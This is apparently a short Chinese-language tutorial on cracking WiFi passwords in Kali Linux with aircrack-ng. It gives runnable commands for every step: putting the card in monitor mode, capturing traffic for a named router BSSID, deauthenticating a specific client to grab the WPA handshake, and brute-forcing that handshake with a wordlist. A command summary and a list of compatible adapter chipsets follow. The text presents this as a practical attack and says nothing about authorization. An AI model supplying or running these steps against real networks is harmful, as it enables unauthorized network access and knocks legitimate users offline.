首先你要有一张支持kali的网卡,因为这整个过程都是在kali下进行的
开启网卡监听模式
# airmon-ng start wlan0
监听附近的无线
# airodump-ng wlan0mon
查看监听的设备
# airodump-ng --bssid B0:D5:9D:EA:9A:E6 -c 1 -w /root/360wifi wlan0mon
–bssid 路由器MAC地址
-c 信道
-w 写入文件的地址
把其中一个设备踢下线
# aireplay-ng -0 30 -a B0:D5:9D:EA:9A:E6 -c 94:87:E0:22:8B:99 wlan0mon
-a 路由器MAC地址
-c 手的MAC地址
-0 发送包的个数
成功抓到握手包
进行暴力破解
# aircrack-ng -w /usr/share/john/password.lst /root/360wifi-02.cap
-w 密码字典
总结
iwconfig //查看网卡
airmon-ng start wlan0 //打开监听
airodump-ng -a wlan0mon //扫描wifi
airodump-ng --bssid B0:D5:9D:EA:9A:E6 -c 1 -w /root/360wifi wlan0mon //抓数据包
aireplay-ng -0 30 -a B0:D5:9D:EA:9A:E6 -c 94:87:E0:22:8B:99 wlan0mon //踢客户端
aircrack-ng -w /usr/share/john/password.lst /root/360wifi-02.cap //破解
无线网卡建议选择以下芯片的网卡
Atheros AR9271
Ralink RT3070
Ralink RT3572
Realtek 8187L (Wireless G adapters)
Realtek RTL8812AU (2017年新增)
经过我的测试Ralink RT5370N也是兼容的